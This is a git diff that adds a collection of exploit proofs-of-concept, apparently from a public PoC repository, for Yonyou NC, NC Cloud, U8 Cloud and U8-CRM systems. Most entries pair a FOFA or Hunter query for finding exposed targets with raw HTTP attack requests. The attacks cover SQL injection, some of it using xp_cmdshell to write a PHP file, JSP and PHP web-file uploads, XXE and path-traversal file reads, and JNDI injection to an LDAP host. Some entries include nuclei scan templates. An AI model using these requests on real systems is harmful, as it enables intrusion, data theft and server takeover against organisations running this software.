+GET /ebvp/infopub/showcontent?id=1'%20waitfor%20delay%20'0:0:6
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+
+```
--- a/用友OA/用友NC-uploadControl接口存在文件上传漏洞.md
+++ b/用友OA/用友NC-uploadControl接口存在文件上传漏洞.md
@@ -0,0 +1,26 @@
+## 用友NC-uploadControl接口存在文件上传漏洞
+
+
+## poc
+```
+POST /mp/login/../uploadControl/uploadFile HTTP/1.1
+Host: 192.168.63.133:8088
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoDIsCqVMmF83ptmp
+Content-Length: 314
+
+------WebKitFormBoundaryoDIsCqVMmF83ptmp
+Content-Disposition: form-data; name="file"; filename="test.jsp"
+Content-Type: application/octet-stream
+
+111
+------WebKitFormBoundaryoDIsCqVMmF83ptmp
+Content-Disposition: form-data; name="submit"
+
+上传
+------WebKitFormBoundaryoDIsCqVMmF83ptmp
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/64e73208-5e7f-4dfe-a3eb-4a56057d6969)
+
+文件路径：`http:127.0.0.1/mp/uploadFileDir/test.jsp`
--- a/用友OA/用友NC-warningDetailInfo接口存在SQL注入漏洞.md
+++ b/用友OA/用友NC-warningDetailInfo接口存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+## 用友NC-warningDetailInfo接口存在SQL注入漏洞
+
+用友NC /ebvp/[infopub](https://cn-sec.com/archives/tag/infopub)/warningDetailInfo接口存在SQL注入漏洞，攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令，从而控制服务器。经过分析与研判，该漏洞利用难度低，建议尽快修复。
+
+影响范围：NC63、NC633、NC65
+
+## fofa
+
+```
+app="用友-UFIDA-NC"
+```
+
+## poc
+
+```
+GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+```
+
+![用友NC warningDetailInfo接口存在SQL注入漏洞](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405251322607.png)
--- a/用友OA/用友NC-workflowImageServlet接口存在sql注入漏洞.md
+++ b/用友OA/用友NC-workflowImageServlet接口存在sql注入漏洞.md
@@ -0,0 +1,17 @@
+## 用友NC-workflowImageServlet接口存在sql注入漏洞
+
+## fofa
+```
+icon_hash="1085941792"  
+```
+
+## poc
+```
+GET /portal/pt/servlet/workflowImageServlet/doPost?pageId=login&wfpk=1&proInsPk=1'waitfor+delay+'0:0:6'-- HTTP/1.1
+Host: 192.168.63.129:8088
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 19
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/558b09c4-0b31-4025-aa2c-61f492690a6c)
--- a/用友OA/用友NCCloud系统runScript存在SQL注入漏洞.md
+++ b/用友OA/用友NCCloud系统runScript存在SQL注入漏洞.md
@@ -0,0 +1,18 @@
+## 用友NCCloud系统runScript存在SQL注入漏洞
+
+
+## poc
+```
+POST /ncchr/attendScript/internal/runScript HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
+Content-Length: 59
+Accept: */*
+Accept-Encoding: gzip
+Accept-Language: en
+Authorization: 58e00466213416018d01d15de83b0198
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+key=1&script=select 1,111*111,USER,4,5,6,7,8,9,10 from dual
+```
--- a/用友OA/用友NC_CLOUD_smartweb2.RPC.d_XML外部实体注入.md
+++ b/用友OA/用友NC_CLOUD_smartweb2.RPC.d_XML外部实体注入.md
@@ -0,0 +1,24 @@
+## 用友NC_CLOUD_smartweb2.RPC.d_XML外部实体注入
+
+用友NC系统的smartweb2.RPC.d接口存在XML外部实体注入漏洞。
+
+## fofa
+```
+app="用友-UFIDA-NC"
+```
+
+## poc
+```
+POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
+Content-Length: 258
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
+```
+![3a124b876c9485904654afbcc4d41771](https://github.com/wy876/POC/assets/139549762/bfe04702-24a5-435a-a67e-e26bfa9447c6)
--- a/用友OA/用友NC_Cloud_soapFormat.ajax接口存在XXE.md
+++ b/用友OA/用友NC_Cloud_soapFormat.ajax接口存在XXE.md
@@ -0,0 +1,22 @@
+## 用友NC_Cloud_soapFormat.ajax接口存在XXE
+
+## fofa
+```
+body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
+```
+
+## poc
+```
+POST /uapws/soapFormat.ajax HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
+Accept-Encoding: gzip, deflate
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Connection: close
+Host: 127.0.0.1
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 259
+
+msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
+```
--- a/用友OA/用友NC_grouptemplet文件上传漏洞.md
+++ b/用友OA/用友NC_grouptemplet文件上传漏洞.md
@@ -0,0 +1,23 @@
+## 用友NC_grouptemplet文件上传漏洞
+
+
+## fofa
+```
+title="YONYOU NC"
+```
+
+
+## poc
+```
+POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp&maxSize=999 HTTP/1.1
+Host: 
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEXmnamw5gVZG9KAQ
+User-Agent: Mozilla/5.0 
+
+------WebKitFormBoundaryEXmnamw5gVZG9KAQ
+Content-Disposition: form-data; name="file"; filename="test.jsp"
+Content-Type: application/octet-stream
+
+111111111111111111111
+------WebKitFormBoundaryEXmnamw5gVZG9KAQ--
+```
--- a/用友OA/用友NC_saveImageServlet接口存在文件上传漏洞.md
+++ b/用友OA/用友NC_saveImageServlet接口存在文件上传漏洞.md
@@ -0,0 +1,27 @@
+## 用友NC_saveImageServlet接口存在文件上传漏洞
+
+
+## fofa
+```
+icon_hash="1085941792"  
+app="用友-UFIDA-NC"
+```
+
+## poc
+```
+POST /portal/pt/servlet/saveImageServlet/doPost?pageId=login&filename=../1.jsp%00 HTTP/1.1
+Host: 
+Content-Type: application/octet-stream
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 19
+
+111
+```
+
+文件路径`http://ip:port/portal/processxml/1.jsp`
+
+![image](https://github.com/wy876/POC/assets/139549762/be012248-101f-4491-863e-4e71c5312ce4)
+
+![image](https://github.com/wy876/POC/assets/139549762/38da1f69-fe44-4cad-b663-b9dfd632d7dd)
+
+
--- a/用友OA/用友NC及U8cloud系统接口LoggingConfigServlet存在反序列化漏洞(XVE-2024-18151).md
+++ b/用友OA/用友NC及U8cloud系统接口LoggingConfigServlet存在反序列化漏洞(XVE-2024-18151).md
--- a/用友OA/用友NC接口ConfigResourceServlet存在反序列漏洞.md
+++ b/用友OA/用友NC接口ConfigResourceServlet存在反序列漏洞.md
--- a/用友OA/用友NC接口PaWfm存在sql注入漏洞.md
+++ b/用友OA/用友NC接口PaWfm存在sql注入漏洞.md
@@ -0,0 +1,18 @@
+## 用友NC接口PaWfm存在sql注入漏洞
+
+## fofa
+```
+icon_hash="1085941792"  
+app="用友-UFIDA-NC"
+```
+
+## poc
+```
+GET /portal/pt/PaWfm/open?pageId=login&proDefPk=11';waitfor+delay+'0:0:6'-- HTTP/1.1
+Host: 192.168.63.129:8088
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 19
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/59a73db4-f658-4a0c-b1ec-3f5dd6bf5f6a)
--- a/用友OA/用友NC接口download存在SQL注入漏洞.md
+++ b/用友OA/用友NC接口download存在SQL注入漏洞.md
@@ -0,0 +1,15 @@
+# 用友NC接口download存在SQL注入漏洞
+
+
+## fofa
+
+```yaml
+app="用友-UFIDA-NC"
+```
+
+## poc
+
+```java
+http://ip/portal/pt/psnImage/download?pageId=login&pk_psndoc=1%27)%20AND%206322=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(79)||CHR(66)||CHR(101),5)%20AND%20(%27rASZ%27=%27rASZ
+```
+
--- a/用友OA/用友NC接口saveXmlToFIleServlet存在文件上传.md
+++ b/用友OA/用友NC接口saveXmlToFIleServlet存在文件上传.md
@@ -0,0 +1,56 @@
+## 用友NC接口saveXmlToFIleServlet存在文件上传
+
+/portal/pt/servlet/saveXmlToFileServlet/doPost接口会保存xml文档到服务器一个路径下，默认会添加.xml后缀，通过Windows的文件名特性可截断.xml文件后缀。再通过目录穿越可上传jsp文件到nc_web目录下。
+
+
+## fofa
+```
+title:"YONYOU NC"
+```
+
+
+## poc
+```
+POST /portal/pt/servlet/saveXmlToFileServlet/doPost?pageId=login&filename=12121.jsp%00 HTTP/1.1
+Host: 
+Content-Type: application/octet-stream
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 19
+
+111
+```
+
+文件路径：`http://ip:port/portal/processxml/12121.jsp`
+
+## nuclei
+```nuclei
+id: yonyou-uap-saveXmlToFileServlet-upload-file
+info:
+  name: yonyou-uap-saveXmlToFileServlet-upload-file
+  author: qianbenhyu
+  severity: high
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/portal/pt/servlet/saveXmlToFileServlet/doPost?pageId=login&filename={{randstr_1}}.jsp%00"
+    headers:
+      Cookie: LA_K1=langid
+      serverEnable: localserver
+      Accept-Encoding: gzip, x-gzip, deflate
+      Content-Length: 27
+      Content-Type: application/octet-stream
+      Content-Encoding: UTF_8
+      Connection: keep-alive
+      User-Agent: Apache-HttpClient/5.2.1 (Java/1.8.0_202)
+    body: "{{randstr_2}}"
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/portal/processxml/{{randstr_1}}.jsp"
+    matchers:
+      - type: word
+        words:
+          - "{{randstr_2}}"
+
+```
--- a/用友OA/用友NC的download文件存在任意文件读取漏洞.md
+++ b/用友OA/用友NC的download文件存在任意文件读取漏洞.md
@@ -0,0 +1,46 @@
+
+## 用友NC的download文件存在任意文件读取漏洞
+
+
+## fofa
+```
+app="用友-UFIDA-NC"
+```
+
+## poc
+```
+/portal/pt/xml/file/download?pageId=login&filename=..%5Cindex.jsp
+```
+![image](https://github.com/wy876/POC/assets/139549762/43853ad7-9323-4874-956c-25b5de054184)
+
+## yaml 批量检测
+```
+id: yonyouNC_download_fileread
+info:
+  name: 用友NC_download文件读取
+  author: mhb17
+  severity: high
+  description: description
+  reference:
+    - https://
+  tags: fileread
+requests:
+  - raw:
+      - |+
+        GET /portal/pt/xml/file/download?pageId=login&filename=..%5Cindex.jsp HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
+        Connection: close
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - '200'
+      - type: word
+        part: body
+        words:
+          - "response.addHeader"
+
+```
--- a/用友OA/用友NC系统FileManager接口存在任意文件上传漏洞.md
+++ b/用友OA/用友NC系统FileManager接口存在任意文件上传漏洞.md
@@ -0,0 +1,25 @@
+# 用友NC系统FileManager接口存在任意文件上传漏洞
+
+NC系统可利用/portal/pt/file/upload 接口中的 filename 参数及 billitem 参数实现任意文件上传，从而控制服务器
+
+## fofa
+
+```yaml
+app="用友-UFIDA-NC"
+```
+
+## poc
+
+```java
+POST /portal/pt/file/upload?pageId=login&filemanager=nc.uap.lfw.file.FileManager&iscover=true&billitem=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwebapps%5Cnc_web%5C HTTP/1.1
+Host:
+Content-Type: multipart/form-data;boundary=d0b7a0d40eed0e32904c8017b09eb305
+
+--d0b7a0d40eed0e32904c8017b09eb305
+Content-Disposition: form-data; name="file"; filename="we.jsp" 
+Content-Type: text/plain
+
+<%out.print("hello world");%>
+--d0b7a0d40eed0e32904c8017b09eb305--
+```
+
--- a/用友OA/用友NC系统complainjudge接口SQL注入漏洞(XVE-2024-19043).md
+++ b/用友OA/用友NC系统complainjudge接口SQL注入漏洞(XVE-2024-19043).md
@@ -0,0 +1,22 @@
+# 用友NC系统complainjudge接口SQL注入漏洞(XVE-2024-19043)
+
+用友NC是由用友公司开发的一套面向大型企业和集团型企业的管理软件产品系列。 用友NC系统/ebvp/advorappcoll/complainbilldetail和complainjudge接口的pk_complaint参数存在SQL注入，攻击者能够通过该漏洞获取泄露服务器信息。
+
+## fofa
+
+```yaml
+app="用友-UFIDA-NC
+```
+
+## poc
+
+```java
+POST /ebvp/advorappcoll/complainjudge HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+
+pageId=login&pk_complaint=11%27;WAITFOR%20DELAY%20%270:0:5%27--
+```
+
--- a/用友OA/用友NC系统linkVoucher存在sql注入漏洞.md
+++ b/用友OA/用友NC系统linkVoucher存在sql注入漏洞.md
@@ -0,0 +1,25 @@
+## 用友NC系统linkVoucher存在sql注入漏洞
+
+NC65系统/portal/pt/yercommon/linkVoucher请求中pkBill存在SQL注入漏洞，可能导致服务器数据泄露。
+
+## fofa
+
+```
+title="YONYOU NC"
+```
+
+## poc
+
+```
+GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1 HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: max-age=0
+Connection: keep-alive
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
+```
+
+![image-20240526184707445](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405261847497.png)
--- a/用友OA/用友NC系统printBill接口存在任意文件读取漏洞.md
+++ b/用友OA/用友NC系统printBill接口存在任意文件读取漏洞.md
@@ -0,0 +1,17 @@
+## 用友NC系统printBill接口存在任意文件读取漏洞
+
+`注意：这个漏洞在读取文件的时候，会将原来的文件删除，谨慎使用。`
+
+## poc
+```
+GET /portal/pt/printpdf/printBill?pageId=login&filePath=../../startup.bat HTTP/1.1
+Host: 192.168.63.129:8088
+User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 68
+
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/af404736-3588-4d7c-a76e-d781fb1d1251)
+
+
--- a/用友OA/用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞.md
+++ b/用友OA/用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞.md
@@ -0,0 +1,24 @@
+# 用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞
+
+用友NC 接口 `/ecp/productonsale/querygoodsgridbycode.json` 存在SQL注入漏洞
+
+## fofa
+
+```yaml
+app="用友-UFIDA-NC"
+```
+
+## poc
+
+```yaml
+GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Pragma: no-cache
+Accept-Language: zh-CN,zh;q=0.9
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Cache-Control: no-cache
+```
+
--- a/用友OA/用友NC系统registerServlet接口存在JNDI注入漏洞.md
+++ b/用友OA/用友NC系统registerServlet接口存在JNDI注入漏洞.md
@@ -0,0 +1,22 @@
+## 用友NC系统registerServlet接口存在JNDI注入漏洞
+
+## fofa
+```
+body="Client/Uclient/UClient.dmg"
+```
+
+
+## poc
+```
+POST /portal/registerServlet HTTP/1.1
+Host: 192.168.63.129:8088
+User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 68
+
+type=1&dsname=ldap://172.17.176.1:8085/blvVEcJU1
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/1aac8d1d-b2c5-4f2d-af47-97c363a59274)
+
+![image](https://github.com/wy876/POC/assets/139549762/e7c8e733-01fc-468b-9acc-b4de63428cdc)
--- a/用友OA/用友NC系统接口UserAuthenticationServlet存在反序列化RCE漏洞(XVE-2024-18302).md
+++ b/用友OA/用友NC系统接口UserAuthenticationServlet存在反序列化RCE漏洞(XVE-2024-18302).md
--- a/用友OA/用友NC系统接口link存在SQL注入漏洞.md
+++ b/用友OA/用友NC系统接口link存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 用友NC系统接口link存在SQL注入漏洞
+
+
+
+## fofa
+
+```yaml
+app="用友-UFIDA-NC"
+```
+
+## poc
+
+```yaml
+GET /portal/pt/link/content?pageId=login&pk_funnode=1';waitfor%20delay%20'0:0:0'--&pk_menuitem=2&pageModule=3&pageName=4 HTTP/1.1
+Host: xx.xx.xx.xx
+Accept-Encoding: identity
+Accept-Language: zh-CN,zh;q=0.8
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
+Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
+Connection: keep-alive
+Referer: http://www.baidu.com
+Cache-Control: max-age=0
+```
+
--- a/Cloud-ArchiveVerify存在SQL注入漏洞.md
+++ b/Cloud-ArchiveVerify存在SQL注入漏洞.md
@@ -0,0 +1,12 @@
+## 用友U8 Cloud-ArchiveVerify存在SQL注入漏洞
+
+
+## poc
+```
+POST /u8cuapws/rest/archive/verify HTTP/1.1
+Host: your-ip
+User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+ 
+{"orgInfo":{"code":"1';WAITFOR DELAY '0:0:5'--"}}
+```
--- a/Cloud-KeyWordReportQuery存在SQL注入漏洞.md
+++ b/Cloud-KeyWordReportQuery存在SQL注入漏洞.md
@@ -0,0 +1,13 @@
+## 用友U8 Cloud-KeyWordReportQuery存在SQL注入漏洞
+
+
+## poc
+```
+POST /service/~iufo/nc.itf.iufo.mobilereport.data.KeyWordReportQuery HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+
+{"reportType":"1';waitfor delay '0:0:3'-- ","pageInfo":{"currentPageIndex":1,"pageSize":1},"keyword":[]}
+```
--- a/用友OA/用友U8-CRM客户关系管理系统downloadfile.php存在任意文件读取漏洞.md
+++ b/用友OA/用友U8-CRM客户关系管理系统downloadfile.php存在任意文件读取漏洞.md
@@ -0,0 +1,19 @@
+## 用友U8-CRM客户关系管理系统downloadfile.php存在任意文件读取漏洞
+
+用友U8 CRM客户关系管理系统/pub/downloadfile.php存在任意文件读取漏洞，未经身份验证的远程攻击者通过漏洞可以获取到服务器敏感信息。
+
+## fofa
+```
+app="用友U8CRM"
+```
+
+## poc
+```
+GET /pub/downloadfile.php?DontCheckLogin=1&url=/datacache/../../../apache/php.ini HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
--- a/用友OA/用友U8-CRM客户关系管理系统getemaildata.php任意文件上传漏洞.md
+++ b/用友OA/用友U8-CRM客户关系管理系统getemaildata.php任意文件上传漏洞.md
@@ -0,0 +1,36 @@
+## 用友U8-CRM客户关系管理系统getemaildata.php任意文件上传漏洞
+
+## hunter
+```
+app.name="用友 CRM"
+```
+
+
+## poc
+```
+POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ
+Content-Length: 517
+
+------WebKitFormBoundarykS5RKgl8t3nwInMQ
+Content-Disposition: form-data; name="file"; filename="test.php "
+Content-Type: text/plain
+
+<?php phpinfo();?>
+------WebKitFormBoundarykS5RKgl8t3nwInMQ
+```
+
+![9147057345d2ec4f1d7c8318ddf36883](https://github.com/wy876/POC/assets/139549762/5b3752aa-824e-4d81-8fe6-5d61cd77dc17)
+
+上传包中文件的名称后要添加一个空格，不然上传之后不会解析。
+
+上传之后返回的路径为E:\\U8SOFT\\turbocrm70\\code\\www\\tmpfile\\，文件名称为mhtB356.tmp.mht；文件不解析，需要访问另一个文件（上传之后会在目录下生成两个文件一个tmp.mht文件和一个tmp.php文件），访问的解析文件格式为udp***.tmp.php，星号部分为返回的文件名的十六进制减去一，例如：B356——>45910(十六进制)，45909（十六进制减一）——>b355。
+
+![0cb454248fb7425131ee976bfff161f2](https://github.com/wy876/POC/assets/139549762/77be2d85-2c4c-46a4-8a95-71d415b2aa1a)
+
+## 漏洞来源
+- https://mp.weixin.qq.com/s/iCkvHKl-QC5o3gj_t02tmg
--- a/用友OA/用友U8-CRM接口exportdictionary.php存在SQL注入漏洞.md
+++ b/用友OA/用友U8-CRM接口exportdictionary.php存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 用友U8-CRM接口exportdictionary.php存在SQL注入漏洞
+
+用友U8-CRM接口 /devtools/tools/exportdictionary.ph p存在SQL注入漏洞
+
+## hunter
+
+```yaml
+app.name="用友 CRM"
+```
+
+## poc
+
+```java
+GET /devtools/tools/exportdictionary.php?DontCheckLogin=1&value=1%27;WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+X-Requested-With: XMLHttpRequest
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: PHPSESSID=bgsesstimeout-; TL_EXPANDED=REL_STAGE2012
+```
+
--- a/用友OA/用友U8-CRM系统接口attrlist存在SQL注入漏洞.md
+++ b/用友OA/用友U8-CRM系统接口attrlist存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 用友U8-CRM系统接口attrlist存在SQL注入漏洞
+
+
+
+## hunter
+
+```yaml
+app.name="用友 CRM"
+```
+
+## poc
+
+```java
+POST /devtools/tools/attrlist.php?DontCheckLogin=1&isquery=1 HTTP/1.1
+Host: 
+Connection: close
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; 
+
+obj_type=1';WAITFOR DELAY '0:0:5'--
+```
+
--- a/用友OA/用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞.md
+++ b/用友OA/用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞.md
@@ -0,0 +1,17 @@
+# 用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞
+
+用友U8-CRM系统接口 /bgt/reservationcomplete.php 存在SQL注入漏洞
+
+## hunter
+
+```yaml
+app.name="用友 CRM"
+```
+
+## poc
+
+```java
+GET /bgt/reservationcomplete.php?DontCheckLogin=1&ID=1112;exec%20master..xp_cmdshell%20%27echo%20^%3C?php%20echo%20hello;?^%3E%20%3E%20D:\U8SOFT\turbocrm70\code\www\hello.php%27; HTTP/1.1
+Host:
+```
+
--- a/upload任意文件上传漏洞.md
+++ b/upload任意文件上传漏洞.md
@@ -0,0 +1,28 @@
+
+## 用友U8-Cloud upload任意文件上传漏洞
+该系统upload.jsp存在任意文件上传漏洞，攻击者可通过该漏洞上传木马，远程控制服务器
+
+## fofa
+```app="用友-U8-Cloud"```
+
+## exp
+```
+POST /linux/pages/upload.jsp HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0
+Connection: close
+Content-Length: 31
+Content-Type: application/x-www-form-urlencoded
+filename: hack.jsp
+Accept-Encoding: gzip
+
+<% out.println("The website has vulnerabilities!!");%>
+```
+## 漏洞复现
+![](https://img-blog.csdnimg.cn/img_convert/4e222417f164a3b33772bf18041feb82.png)
+
+![](https://img-blog.csdnimg.cn/img_convert/d68273de84c541f1cb5a0ac52b469b98.png)
+
+## 路径
+http://ip:port/linux/hack.jsp
+
--- a/用友OA/用友U8-Cloud-TableInputOperServlet存在反序列化漏洞.md
+++ b/用友OA/用友U8-Cloud-TableInputOperServlet存在反序列化漏洞.md
--- a/用友OA/用友U8-Cloud-linkntb.jsp存在SQL注入漏洞(CNVD-C-2023-708748).md
+++ b/用友OA/用友U8-Cloud-linkntb.jsp存在SQL注入漏洞(CNVD-C-2023-708748).md
@@ -0,0 +1,25 @@
+## 用友U8-Cloud-linkntb.jsp存在SQL注入漏洞(CNVD-C-2023-708748)
+
+
+
+## fofa
+
+```
+title="U8C"
+app="用友-U8-Cloud"
+```
+
+
+
+## poc
+
+```
+GET /yer/html/nodes/linkntb/linkntb.jsp?pageId=linkntb&billId=1%27%29+AND+5846%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%285846%3D5846%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%29--+Astq&djdl=1&rand=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
